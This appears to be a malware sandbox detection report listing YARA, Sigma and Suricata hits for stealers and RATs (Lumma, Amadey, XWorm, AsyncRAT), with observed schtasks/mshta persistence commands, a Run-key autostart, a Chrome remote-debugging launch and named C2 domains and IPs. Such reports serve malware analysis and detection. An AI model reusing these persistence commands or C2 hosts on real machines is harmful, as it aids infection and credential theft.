26.2.MvowLGc.exe.3078e08.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x70c7:$str01: $VB$Local_Port 0x11557:$str01: $VB$Local_Port 0x2bbdb:$str01: $VB$Local_Port 0x70b8:$str02: $VB$Local_Host 0x11548:$str02: $VB$Local_Host 0x2bbcc:$str02: $VB$Local_Host 0x7314:$str03: get_Jpeg 0x117a4:$str03: get_Jpeg 0x2be28:$str03: get_Jpeg 0x6da3:$str04: get_ServicePack 0x11233:$str04: get_ServicePack 0x2b8b7:$str04: get_ServicePack 0x8214:$str05: Select * from AntivirusProduct 0x126a4:$str05: Select * from AntivirusProduct 0x2cd28:$str05: Select * from AntivirusProduct 0x8412:$str06: PCRestart 0x128a2:$str06: PCRestart 0x2cf26:$str06: PCRestart 0x8426:$str07: shutdown.exe /f /r /t 0 0x128b6:$str07: shutdown.exe /f /r /t 0 0x2cf3a:$str07: shutdown.exe /f /r /t 0
26.2.MvowLGc.exe.3078e08.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8bf4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13084:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2d708:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8c91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13121:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2d7a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8da6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13236:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2d8ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8786:$cnc4: POST / HTTP/1.1 0x12c16:$cnc4: POST / HTTP/1.1 0x2d29a:$cnc4: POST / HTTP/1.1
10.0.L65uNi1.exe.bb0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.skotes.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.random.exe.6d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.e30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe, ParentProcessId: 3212, ParentProcessName: b3d465ea47.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn MbBLmmautKb /tr "mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 3852, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3d465ea47.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe, ParentProcessId: 3212, ParentProcessName: b3d465ea47.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, ProcessId: 3492, ProcessName: mshta.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe, ParentProcessId: 3212, ParentProcessName: b3d465ea47.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, ProcessId: 3492, ProcessName: mshta.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe, ParentProcessId: 2744, ParentProcessName: 1VB7gm8.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6032, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3d465ea47.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:58.042402+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.6	54241	1.1.1.1	53	UDP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:16.779614+0100	2028371	3	Unknown Traffic	192.168.2.6	49892	172.67.139.208	443	TCP
2025-02-07T17:46:17.427588+0100	2028371	3	Unknown Traffic	192.168.2.6	49898	172.67.139.208	443	TCP
2025-02-07T17:46:18.893133+0100	2028371	3	Unknown Traffic	192.168.2.6	49912	172.67.139.208	443	TCP
2025-02-07T17:46:21.786553+0100	2028371	3	Unknown Traffic	192.168.2.6	49932	172.67.139.208	443	TCP
2025-02-07T17:46:22.692186+0100	2028371	3	Unknown Traffic	192.168.2.6	49939	172.67.139.208	443	TCP
2025-02-07T17:46:27.186917+0100	2028371	3	Unknown Traffic	192.168.2.6	49967	172.67.139.208	443	TCP
2025-02-07T17:46:28.374779+0100	2028371	3	Unknown Traffic	192.168.2.6	49986	172.67.139.208	443	TCP
2025-02-07T17:46:29.950221+0100	2028371	3	Unknown Traffic	192.168.2.6	50001	104.21.80.1	443	TCP
2025-02-07T17:46:30.178017+0100	2028371	3	Unknown Traffic	192.168.2.6	50003	172.67.139.208	443	TCP
2025-02-07T17:46:30.503896+0100	2028371	3	Unknown Traffic	192.168.2.6	50007	172.67.139.208	443	TCP
2025-02-07T17:46:30.648860+0100	2028371	3	Unknown Traffic	192.168.2.6	50010	104.21.80.1	443	TCP
2025-02-07T17:46:32.043464+0100	2028371	3	Unknown Traffic	192.168.2.6	50024	172.67.139.208	443	TCP
2025-02-07T17:46:32.211757+0100	2028371	3	Unknown Traffic	192.168.2.6	50030	172.67.139.208	443	TCP
2025-02-07T17:46:32.534695+0100	2028371	3	Unknown Traffic	192.168.2.6	50035	104.21.80.1	443	TCP
2025-02-07T17:46:33.274177+0100	2028371	3	Unknown Traffic	192.168.2.6	50041	172.67.139.208	443	TCP
2025-02-07T17:46:34.033854+0100	2028371	3	Unknown Traffic	192.168.2.6	50047	104.21.80.1	443	TCP
2025-02-07T17:46:34.880370+0100	2028371	3	Unknown Traffic	192.168.2.6	50053	172.67.139.208	443	TCP
2025-02-07T17:46:35.607128+0100	2028371	3	Unknown Traffic	192.168.2.6	50057	172.67.139.208	443	TCP
2025-02-07T17:46:35.842995+0100	2028371	3	Unknown Traffic	192.168.2.6	50058	104.21.80.1	443	TCP
2025-02-07T17:46:36.305472+0100	2028371	3	Unknown Traffic	192.168.2.6	50059	172.67.139.208	443	TCP
2025-02-07T17:46:37.536931+0100	2028371	3	Unknown Traffic	192.168.2.6	50062	104.21.80.1	443	TCP
2025-02-07T17:46:37.933684+0100	2028371	3	Unknown Traffic	192.168.2.6	50064	172.67.139.208	443	TCP
2025-02-07T17:46:38.675636+0100	2028371	3	Unknown Traffic	192.168.2.6	50066	172.67.139.208	443	TCP
2025-02-07T17:46:38.709942+0100	2028371	3	Unknown Traffic	192.168.2.6	50067	172.67.139.208	443	TCP
2025-02-07T17:46:39.920087+0100	2028371	3	Unknown Traffic	192.168.2.6	50071	104.21.80.1	443	TCP
2025-02-07T17:46:40.060984+0100	2028371	3	Unknown Traffic	192.168.2.6	50072	172.67.139.208	443	TCP
2025-02-07T17:46:41.165104+0100	2028371	3	Unknown Traffic	192.168.2.6	50074	172.67.139.208	443	TCP
2025-02-07T17:46:42.209634+0100	2028371	3	Unknown Traffic	192.168.2.6	50075	172.67.139.208	443	TCP
2025-02-07T17:46:42.483435+0100	2028371	3	Unknown Traffic	192.168.2.6	50076	172.67.139.208	443	TCP
2025-02-07T17:46:42.955942+0100	2028371	3	Unknown Traffic	192.168.2.6	50077	104.21.80.1	443	TCP
2025-02-07T17:46:43.136463+0100	2028371	3	Unknown Traffic	192.168.2.6	50078	172.67.139.208	443	TCP
2025-02-07T17:46:43.843372+0100	2028371	3	Unknown Traffic	192.168.2.6	50081	172.67.139.208	443	TCP
2025-02-07T17:46:45.039732+0100	2028371	3	Unknown Traffic	192.168.2.6	50084	172.67.139.208	443	TCP
2025-02-07T17:46:45.754435+0100	2028371	3	Unknown Traffic	192.168.2.6	50085	172.67.139.208	443	TCP
2025-02-07T17:46:46.476300+0100	2028371	3	Unknown Traffic	192.168.2.6	50086	172.67.139.208	443	TCP
2025-02-07T17:46:47.710563+0100	2028371	3	Unknown Traffic	192.168.2.6	50090	172.67.139.208	443	TCP
2025-02-07T17:46:47.801876+0100	2028371	3	Unknown Traffic	192.168.2.6	50091	172.67.139.208	443	TCP
2025-02-07T17:46:49.197079+0100	2028371	3	Unknown Traffic	192.168.2.6	50092	172.67.139.208	443	TCP
2025-02-07T17:46:51.019669+0100	2028371	3	Unknown Traffic	192.168.2.6	50094	172.67.139.208	443	TCP
2025-02-07T17:46:53.804202+0100	2028371	3	Unknown Traffic	192.168.2.6	50104	172.67.139.208	443	TCP
2025-02-07T17:46:59.152364+0100	2028371	3	Unknown Traffic	192.168.2.6	50145	104.21.80.1	443	TCP
2025-02-07T17:46:59.825994+0100	2028371	3	Unknown Traffic	192.168.2.6	50151	104.21.80.1	443	TCP
2025-02-07T17:47:01.505422+0100	2028371	3	Unknown Traffic	192.168.2.6	50168	104.21.80.1	443	TCP
2025-02-07T17:47:03.663698+0100	2028371	3	Unknown Traffic	192.168.2.6	50183	104.21.80.1	443	TCP
2025-02-07T17:47:05.485703+0100	2028371	3	Unknown Traffic	192.168.2.6	50186	104.21.80.1	443	TCP
2025-02-07T17:47:06.402971+0100	2028371	3	Unknown Traffic	192.168.2.6	50188	172.67.150.254	443	TCP
2025-02-07T17:47:07.069286+0100	2028371	3	Unknown Traffic	192.168.2.6	50190	104.21.80.1	443	TCP
2025-02-07T17:47:07.075827+0100	2028371	3	Unknown Traffic	192.168.2.6	50191	172.67.150.254	443	TCP
2025-02-07T17:47:09.985284+0100	2028371	3	Unknown Traffic	192.168.2.6	50196	104.21.80.1	443	TCP
2025-02-07T17:47:10.046118+0100	2028371	3	Unknown Traffic	192.168.2.6	50197	172.67.150.254	443	TCP
2025-02-07T17:47:12.387140+0100	2028371	3	Unknown Traffic	192.168.2.6	50201	104.21.80.1	443	TCP
2025-02-07T17:47:12.475688+0100	2028371	3	Unknown Traffic	192.168.2.6	50202	172.67.150.254	443	TCP
2025-02-07T17:47:13.783977+0100	2028371	3	Unknown Traffic	192.168.2.6	50204	172.67.150.254	443	TCP
2025-02-07T17:47:17.786761+0100	2028371	3	Unknown Traffic	192.168.2.6	50217	172.67.150.254	443	TCP
2025-02-07T17:47:24.853124+0100	2028371	3	Unknown Traffic	192.168.2.6	50221	172.67.150.254	443	TCP
2025-02-07T17:47:29.381679+0100	2028371	3	Unknown Traffic	192.168.2.6	50224	172.67.150.254	443	TCP
2025-02-07T17:47:46.719214+0100	2028371	3	Unknown Traffic	192.168.2.6	50231	172.67.150.254	443	TCP
2025-02-07T17:47:47.478319+0100	2028371	3	Unknown Traffic	192.168.2.6	50232	172.67.150.254	443	TCP
2025-02-07T17:47:49.481749+0100	2028371	3	Unknown Traffic	192.168.2.6	50236	172.67.150.254	443	TCP
2025-02-07T17:47:50.848118+0100	2028371	3	Unknown Traffic	192.168.2.6	50237	172.67.150.254	443	TCP
2025-02-07T17:47:52.202821+0100	2028371	3	Unknown Traffic	192.168.2.6	50239	172.67.150.254	443	TCP
2025-02-07T17:47:53.707427+0100	2028371	3	Unknown Traffic	192.168.2.6	50241	172.67.150.254	443	TCP
2025-02-07T17:47:55.594780+0100	2028371	3	Unknown Traffic	192.168.2.6	50245	172.67.150.254	443	TCP
2025-02-07T17:47:58.707247+0100	2028371	3	Unknown Traffic	192.168.2.6	50252	172.67.150.254	443	TCP

ET MALWARE Amadey Bot Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:26.211255+0100	2044623	1	A Network Trojan was detected	192.168.2.6	49965	185.215.113.43	80	TCP
2025-02-07T17:46:46.729868+0100	2044623	1	A Network Trojan was detected	192.168.2.6	50087	185.215.113.43	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:16.954340+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49892	172.67.139.208	443	TCP
2025-02-07T17:46:18.265720+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49898	172.67.139.208	443	TCP
2025-02-07T17:46:22.098467+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49932	172.67.139.208	443	TCP
2025-02-07T17:46:23.167003+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49939	172.67.139.208	443	TCP
2025-02-07T17:46:30.124713+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50001	104.21.80.1	443	TCP
2025-02-07T17:46:31.440215+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50010	104.21.80.1	443	TCP
2025-02-07T17:46:36.058550+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50057	172.67.139.208	443	TCP
2025-02-07T17:46:38.124642+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50064	172.67.139.208	443	TCP
2025-02-07T17:46:39.351577+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50066	172.67.139.208	443	TCP
2025-02-07T17:46:39.720115+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50067	172.67.139.208	443	TCP
2025-02-07T17:46:42.575192+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50075	172.67.139.208	443	TCP
2025-02-07T17:46:43.650227+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50078	172.67.139.208	443	TCP
2025-02-07T17:46:43.750596+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50077	104.21.80.1	443	TCP
2025-02-07T17:46:48.643332+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50091	172.67.139.208	443	TCP
2025-02-07T17:46:54.315455+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50104	172.67.139.208	443	TCP
2025-02-07T17:46:59.315842+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50145	104.21.80.1	443	TCP
2025-02-07T17:47:00.747994+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50151	104.21.80.1	443	TCP
2025-02-07T17:47:06.560619+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50188	172.67.150.254	443	TCP
2025-02-07T17:47:07.906251+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50191	172.67.150.254	443	TCP
2025-02-07T17:47:13.145792+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50201	104.21.80.1	443	TCP
2025-02-07T17:47:30.226091+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50224	172.67.150.254	443	TCP
2025-02-07T17:47:46.863206+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50231	172.67.150.254	443	TCP
2025-02-07T17:47:48.008048+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50232	172.67.150.254	443	TCP
2025-02-07T17:47:59.495456+0100	2054653	1	A Network Trojan was detected	192.168.2.6	50252	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:16.954340+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49892	172.67.139.208	443	TCP
2025-02-07T17:46:22.098467+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49932	172.67.139.208	443	TCP
2025-02-07T17:46:30.124713+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50001	104.21.80.1	443	TCP
2025-02-07T17:46:38.124642+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50064	172.67.139.208	443	TCP
2025-02-07T17:46:42.575192+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50075	172.67.139.208	443	TCP
2025-02-07T17:46:59.315842+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50145	104.21.80.1	443	TCP
2025-02-07T17:47:06.560619+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50188	172.67.150.254	443	TCP
2025-02-07T17:47:46.863206+0100	2049836	1	A Network Trojan was detected	192.168.2.6	50231	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:18.265720+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49898	172.67.139.208	443	TCP
2025-02-07T17:46:23.167003+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49939	172.67.139.208	443	TCP
2025-02-07T17:46:31.440215+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50010	104.21.80.1	443	TCP
2025-02-07T17:46:39.351577+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50066	172.67.139.208	443	TCP
2025-02-07T17:46:43.650227+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50078	172.67.139.208	443	TCP
2025-02-07T17:47:00.747994+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50151	104.21.80.1	443	TCP
2025-02-07T17:47:07.906251+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50191	172.67.150.254	443	TCP
2025-02-07T17:47:48.008048+0100	2049812	1	A Network Trojan was detected	192.168.2.6	50232	172.67.150.254	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:29.950221+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50001	104.21.80.1	443	TCP
2025-02-07T17:46:30.648860+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50010	104.21.80.1	443	TCP
2025-02-07T17:46:32.534695+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50035	104.21.80.1	443	TCP
2025-02-07T17:46:34.033854+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50047	104.21.80.1	443	TCP
2025-02-07T17:46:35.842995+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50058	104.21.80.1	443	TCP
2025-02-07T17:46:37.536931+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50062	104.21.80.1	443	TCP
2025-02-07T17:46:39.920087+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50071	104.21.80.1	443	TCP
2025-02-07T17:46:42.955942+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50077	104.21.80.1	443	TCP
2025-02-07T17:46:59.152364+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50145	104.21.80.1	443	TCP
2025-02-07T17:46:59.825994+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50151	104.21.80.1	443	TCP
2025-02-07T17:47:01.505422+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50168	104.21.80.1	443	TCP
2025-02-07T17:47:03.663698+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50183	104.21.80.1	443	TCP
2025-02-07T17:47:05.485703+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50186	104.21.80.1	443	TCP
2025-02-07T17:47:07.069286+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50190	104.21.80.1	443	TCP
2025-02-07T17:47:09.985284+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50196	104.21.80.1	443	TCP
2025-02-07T17:47:12.387140+0100	2059908	1	Domain Observed Used for C2 Detected	192.168.2.6	50201	104.21.80.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:47:06.402971+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50188	172.67.150.254	443	TCP
2025-02-07T17:47:07.075827+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50191	172.67.150.254	443	TCP
2025-02-07T17:47:10.046118+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50197	172.67.150.254	443	TCP
2025-02-07T17:47:12.475688+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50202	172.67.150.254	443	TCP
2025-02-07T17:47:13.783977+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50204	172.67.150.254	443	TCP
2025-02-07T17:47:17.786761+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50217	172.67.150.254	443	TCP
2025-02-07T17:47:24.853124+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50221	172.67.150.254	443	TCP
2025-02-07T17:47:29.381679+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50224	172.67.150.254	443	TCP
2025-02-07T17:47:46.719214+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50231	172.67.150.254	443	TCP
2025-02-07T17:47:47.478319+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50232	172.67.150.254	443	TCP
2025-02-07T17:47:49.481749+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50236	172.67.150.254	443	TCP
2025-02-07T17:47:50.848118+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50237	172.67.150.254	443	TCP
2025-02-07T17:47:52.202821+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50239	172.67.150.254	443	TCP
2025-02-07T17:47:53.707427+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50241	172.67.150.254	443	TCP
2025-02-07T17:47:55.594780+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50245	172.67.150.254	443	TCP
2025-02-07T17:47:58.707247+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.6	50252	172.67.150.254	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (torpdidebar .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:46:16.779614+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49892	172.67.139.208	443	TCP
2025-02-07T17:46:17.427588+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49898	172.67.139.208	443	TCP
2025-02-07T17:46:18.893133+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49912	172.67.139.208	443	TCP
2025-02-07T17:46:21.786553+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49932	172.67.139.208	443	TCP
2025-02-07T17:46:22.692186+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49939	172.67.139.208	443	TCP
2025-02-07T17:46:27.186917+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49967	172.67.139.208	443	TCP
2025-02-07T17:46:28.374779+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	49986	172.67.139.208	443	TCP
2025-02-07T17:46:30.178017+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50003	172.67.139.208	443	TCP
2025-02-07T17:46:30.503896+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50007	172.67.139.208	443	TCP
2025-02-07T17:46:32.043464+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50024	172.67.139.208	443	TCP
2025-02-07T17:46:32.211757+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50030	172.67.139.208	443	TCP
2025-02-07T17:46:33.274177+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50041	172.67.139.208	443	TCP
2025-02-07T17:46:34.880370+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50053	172.67.139.208	443	TCP
2025-02-07T17:46:35.607128+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50057	172.67.139.208	443	TCP
2025-02-07T17:46:36.305472+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50059	172.67.139.208	443	TCP
2025-02-07T17:46:37.933684+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50064	172.67.139.208	443	TCP
2025-02-07T17:46:38.675636+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50066	172.67.139.208	443	TCP
2025-02-07T17:46:38.709942+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50067	172.67.139.208	443	TCP
2025-02-07T17:46:40.060984+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50072	172.67.139.208	443	TCP
2025-02-07T17:46:41.165104+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50074	172.67.139.208	443	TCP
2025-02-07T17:46:42.209634+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50075	172.67.139.208	443	TCP
2025-02-07T17:46:42.483435+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50076	172.67.139.208	443	TCP
2025-02-07T17:46:43.136463+0100	2059932	1	Domain Observed Used for C2 Detected	192.168.2.6	50078	172.67.139.208	443	TCP
